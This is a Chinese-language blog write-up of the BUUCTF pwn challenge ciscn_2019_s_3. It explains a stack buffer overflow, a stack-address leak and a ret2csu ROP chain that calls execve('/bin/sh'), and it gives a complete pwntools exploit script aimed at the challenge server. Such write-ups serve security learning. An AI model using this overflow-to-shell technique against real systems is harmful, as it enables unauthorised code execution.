

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="">
  <meta name="keywords" content="">
  
    <meta name="description" content="题目简介BUUCTF原题，题目链接在这：BUUCTF原题：ciscn_2019_s_3">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-ciscn_2019_s_3">
<meta property="og:url" content="http://0x4a-210.github.io/2025/08/05/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn-2019-s-3/index.html">
<meta property="og:site_name" content="0x4A">
<meta property="og:description" content="题目简介BUUCTF原题，题目链接在这：BUUCTF原题：ciscn_2019_s_3">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/IDA-vuln.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/mov-rax.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/find-string.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/buf-addr.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/leak-addr.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/csu.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/cyclic.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/Ubuntu18-offset.png">
<meta property="article:published_time" content="2025-08-05T12:04:41.000Z">
<meta property="article:modified_time" content="2025-08-06T02:17:44.702Z">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/IDA-vuln.png">
  
  
  
  <title>BUUCTF-ciscn_2019_s_3 - 0x4A</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"0x4a-210.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0x4A</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/Istaroth.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="BUUCTF-ciscn_2019_s_3"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-08-05 20:04" pubdate>
          August 5, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.6k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          14 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">BUUCTF-ciscn_2019_s_3</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="题目简介"><a href="#题目简介" class="headerlink" title="题目简介"></a>题目简介</h1><p>BUUCTF原题，题目链接在这：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#ciscn_2019_s_3">BUUCTF原题：ciscn_2019_s_3</a><br></p>
<span id="more"></span>
<p>这道题的坑比较多，通过这题学到了很多细节上的东西，于是记录一下<br></p>
<h1 id="漏洞点分析"><a href="#漏洞点分析" class="headerlink" title="漏洞点分析"></a>漏洞点分析</h1><p>首先拖进IDA观察，main函数就不多说了，直接跟进vuln函数<br><br><img src="/../../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/IDA-vuln.png" srcset="/img/loading.gif" lazyload><br>如图所示，看到read读取0x400字节，因此存在溢出<br><br>之后checksec检查，发现只开了NX<br><br>之后，查看gadget函数的反汇编，发现存在mov rax,3b的指令，如下图所示；而3b恰好是execve系统调用号<br><br><img src="/../../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/mov-rax.png" srcset="/img/loading.gif" lazyload><br>同时，函数表中没有发现任何明显可以泄露地址的函数（puts、write、printf等），所以不能ret2libc<br><br>综上，这道题的漏洞点在于通过溢出劫持执行流到ROP链，执行execve(“&#x2F;bin&#x2F;sh”,0,0)系统调用<br></p>
<h1 id="漏洞点利用"><a href="#漏洞点利用" class="headerlink" title="漏洞点利用"></a>漏洞点利用</h1><p>首先寻找&#x2F;bin&#x2F;sh字符串的位置，shift+F12发现程序本身没有：<br><br><img src="/../../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/find-string.png" srcset="/img/loading.gif" lazyload><br>因此只能想办法将其布置在某个可写位置<br><br>首先想到布置在栈上，但是栈地址未知，需要能够泄露栈地址，这里观察到在vuln函数里存在一个write系统调用会输出0x30个字节，而buf只有16字节，因此该write操作会输出栈上的高地址处内容，有可能泄露栈上某个地址<br><br>具体泄露的是什么地址，需要通过调试确定，这里通过python脚本来确定，在0x400501即vuln函数调用read之前设置断点，并将泄露的地址写入文件保存，和buf地址相减计算偏移：<br></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">ioTube=gdb.debug(targetELF,<span class="hljs-string">&quot;b *0x400501&quot;</span>)<br>realAddr=LeakAddr(ioTube)<br><span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;addr.txt&quot;</span>,<span class="hljs-string">&quot;w&quot;</span>).write(<span class="hljs-built_in">hex</span>(realAddr))<br></code></pre></td></tr></table></figure>
<p>具体的操作如下所示：<br><br>首先在调用read之前看到buf地址在0x7fff21e640d0，如下图：<br><br><img src="/../../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/buf-addr.png" srcset="/img/loading.gif" lazyload><br>之后继续执行程序，看到泄露地址&#x3D;0x7fff21e64218，如下图：<br><br><img src="/../../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/leak-addr.png" srcset="/img/loading.gif" lazyload><br>综上，可以得到泄露地址距离buf地址有0x148字节<br><br>第二个问题是如何布置参数，通过ROPgadget工具，可以发现程序本身不存在控制rdx的可用碎片，至此利用思路似乎陷入僵局<br><br>但是，任何一个程序的__libc_csu_init函数里基本都会存在一些可以控制各个寄存器的代码段，如下图所示：<br><br><img src="/../../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/csu.png" srcset="/img/loading.gif" lazyload><br>可以看到，在0x40059a地址开始，有一系列设置寄存器的指令，并且最后以ret结尾，而从0x400580地址开始，又存在我们想要的设置rdx等寄存器的指令<br><br>综上，可以先返回到0x40059a，将栈上布置好的值pop给r12~r15等寄存器；之后返回到0x400580地址处，再将需要的值mov给rdx、rsi等寄存器<br><br>这里再说一下payload构造的一些细节：<br><br>第一，r15寄存器没有作用（只能控制edi）所以直接置0即可<br><br>第二，关键的是r12、rbp、rbx寄存器，由于在第二阶段会call [r12+rbx<em>8]<br><br>因此我们可以把rbx置0，r12设置成： <em><strong>想要的返回地址所在的地址</strong></em> 注意，为什么这里r12要是二级指针，因为是call [r12]而不是call r12（做题时在这里卡了很久，没注意到有一次解引用……）<br><br>至于rbp，由于0x400591地址处存在一个比较和循环，所以需要把rbp设置成rbx+1，以便跳出循环，让程序顺利走到最后的ret指令<br><br>最后，在第二阶段，还需要填充一共7</em>8&#x3D;56字节的脏数据，因为从0x400596到0x4005a2的指令会让rsp移动56字节<br><br>因此构造的payload如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python">csuSetStack=<span class="hljs-number">0x40059a</span>       <span class="hljs-comment"># push rbx ; push rbp; push r12 ; push r13 ; push r14 ; push r15 ; ret</span><br>csuSetRegister=<span class="hljs-number">0x400580</span>    <span class="hljs-comment">#                                 rdx=r13;  rsi=r14 ; edi=r15   call r12 ; rbx+=1 ; cmp rbx ,rbp; jne back ; csuSetStack……ret</span><br>binshStackAddr=reals-<span class="hljs-number">0x148</span><br>padding=<span class="hljs-string">b&#x27;A&#x27;</span>*<span class="hljs-number">56</span><br>payload2=<span class="hljs-string">b&quot;/bin/sh\x00&quot;</span>+p64(mov_rax_ret)<br>payload2+=p64(csuSetStack)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">1</span>)+p64(binshStackAddr+<span class="hljs-number">0x8</span>)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0</span>)<br>payload2+=p64(csuSetRegister)+padding<br>payload2+=p64(pop_rdi_ret)+p64(binshStackAddr)+p64(syscallAddr)+p64(backAddr)<br></code></pre></td></tr></table></figure>
<p>其中，reals为泄露的栈地址，这里我采用让call [r12]跳转到mov rax,59的指令处，并把该指令布置在&#x2F;bin&#x2F;sh字符串的上方<br><br>最后一步，确定buffer首地址距离vuln函数返回地址的偏移量<br><br>为什么这一步放到最后记录，因为这道题目有一个巨大的坑，如果只通过IDA来确定偏移量，如第一张图所示，offset应该&#x3D;0x10+0x8&#x3D;0x18<br><br>但是这是错的，这道题不能依赖IDA来确定offset，因为当仔细观察vuln函数的反汇编时会发现，结尾并没有熟悉的leave操作，而是直接ret，并不符合一般函数的退栈流程，因此不能假定返回地址在rbp的高一格位置<br><br>至于为什么会出现这种情况？个人怀疑这里是出题者故意设计的，因为我们需要一个syscall ; ret的碎片，所以出题者故意没有加leave指令<br><br>因此需要使用cyclic工具来计算偏移量，最后算出来offset&#x3D;0x10，如下图所示：<br><img src="/../../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/cyclic.png" srcset="/img/loading.gif" lazyload><br>综上，可以写出如下的利用脚本：<br></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(os=<span class="hljs-string">&quot;linux&quot;</span>,arch=<span class="hljs-string">&quot;x86_64&quot;</span>,log_level=<span class="hljs-string">&quot;debug&quot;</span>)<br>context.terminal=[<span class="hljs-string">&quot;tmux&quot;</span>,<span class="hljs-string">&quot;splitw&quot;</span>,<span class="hljs-string">&quot;-h&quot;</span>]<br>LOCAL=<span class="hljs-number">0</span><br>REMOTE=<span class="hljs-number">1</span><br>DEBUG=<span class="hljs-number">2</span><br><br>targetELF=<span class="hljs-string">&quot;./pwn&quot;</span><br>elf=ELF(targetELF)<br>offset=<span class="hljs-number">16</span><br><br>backAddr=elf.symbols[<span class="hljs-string">&quot;vuln&quot;</span>]<br><br>retAlignPadding=<span class="hljs-number">0x4003a9</span>   <span class="hljs-comment"># ret</span><br>mov_rax_ret=<span class="hljs-number">0x4004e2</span>       <span class="hljs-comment"># mov rax,59 ; ret</span><br>pop_rdi_ret=<span class="hljs-number">0x4005a3</span>       <span class="hljs-comment"># pop rdi ; ret</span><br>syscallAddr=<span class="hljs-number">0x400517</span>       <span class="hljs-comment"># syscall</span><br>csuSetStack=<span class="hljs-number">0x40059a</span>       <span class="hljs-comment"># push rbx ; push rbp; push r12 ; push r13 ; push r14 ; push r15 ; ret</span><br>csuSetRegister=<span class="hljs-number">0x400580</span>    <span class="hljs-comment">#                                 rdx=r13;  rsi=r14 ; edi=r15   call r12 ; rbx+=1 ; cmp rbx ,rbp; jne back ; csuSetStack……ret</span><br><br>binshBytes=<span class="hljs-number">0x2f62696e2f736800</span> <br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Lauch</span>(<span class="hljs-params">mode=LOCAL</span>):<br>    <span class="hljs-keyword">if</span> mode==LOCAL:<br>        ioTube=process(targetELF)<br>        <span class="hljs-keyword">return</span> ioTube<br>    <span class="hljs-keyword">elif</span> mode ==REMOTE:<br>        ioTube=remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">25733</span>)<br>        <span class="hljs-keyword">return</span> ioTube<br>    <span class="hljs-keyword">elif</span> mode==DEBUG:<br>        ioTube=gdb.debug(targetELF,<span class="hljs-string">&quot;b *0x400519&quot;</span>)<br>        <span class="hljs-keyword">return</span> ioTube<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">LeakAddr</span>(<span class="hljs-params">io</span>):<br>    payload1=<span class="hljs-string">b&#x27;a&#x27;</span>*offset+p64(backAddr)<br>    io.send(payload1)<br>    io.recv(<span class="hljs-number">0x20</span>)<br>    response=io.recv(<span class="hljs-number">0x10</span>)<br>    realAddr=u64(response[<span class="hljs-number">0</span>:<span class="hljs-number">8</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>    <span class="hljs-keyword">return</span> realAddr<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Attack</span>(<span class="hljs-params">io,reals</span>):<br>    binshStackAddr=reals-<span class="hljs-number">0x148</span><br>    padding=<span class="hljs-string">b&#x27;A&#x27;</span>*<span class="hljs-number">56</span><br>    payload2=<span class="hljs-string">b&quot;/bin/sh\x00&quot;</span>+p64(mov_rax_ret)<br>    payload2+=p64(csuSetStack)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">1</span>)+p64(binshStackAddr+<span class="hljs-number">0x8</span>)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0</span>)<br>    payload2+=p64(csuSetRegister)+padding<br>    payload2+=p64(pop_rdi_ret)+p64(binshStackAddr)+p64(syscallAddr)+p64(backAddr)<br>    io.send(payload2)                                      <br>    io.recv()<br>    io.interactive()<br><br>ioTube=Lauch()<br>realAddr=LeakAddr(ioTube)<br><span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;addr.txt&quot;</span>,<span class="hljs-string">&quot;w&quot;</span>).write(<span class="hljs-built_in">hex</span>(realAddr))<br>Attack(ioTube,realAddr)<br></code></pre></td></tr></table></figure>
<p>但是至此还没结束，这也是这道题的最后一个坑<br><br>由于上述分析是在ubuntu22上进行的，因此当我在本地打通之后，无法打通远程<br><br>后来观察题目，发现服务器环境是ubuntu18，因此换了台ubuntu18的虚拟机，重新分析了一遍，发现是泄露地址距离buf的偏移发生了变化（上文算的0x148不对），如下图所示：<br><br><img src="/../../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/BUUCTF-ciscn_2019_s_3/Ubuntu18-offset.png" srcset="/img/loading.gif" lazyload><br>可以看到二者距离应该是0x7ffc426e0da8-0x7ffc426e0c90&#x3D;0x118<br>其他地址并没有错误，因此将上述脚本中的binshStackAddr改为reals-0x118即可<br></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" class="category-chain-item">pwn刷题记录</a>
  
  
    <span>></span>
    
  <a href="/categories/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/" class="category-chain-item">ROP</a>
  
  
    <span>></span>
    
  <a href="/categories/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2text/" class="category-chain-item">ret2text</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>BUUCTF-ciscn_2019_s_3</div>
      <div>http://0x4a-210.github.io/2025/08/05/pwn刷题记录/ROP/ret2text/BUUCTF-ciscn-2019-s-3/</div>
    </div>
    <div class="license-meta">
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>August 5, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/08/01/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ROP/ret2libc/BUUCTF-jarvisoj-level1/" title="BUUCTF-jarvisoj_level1">
                        <span class="hidden-mobile">BUUCTF-jarvisoj_level1</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
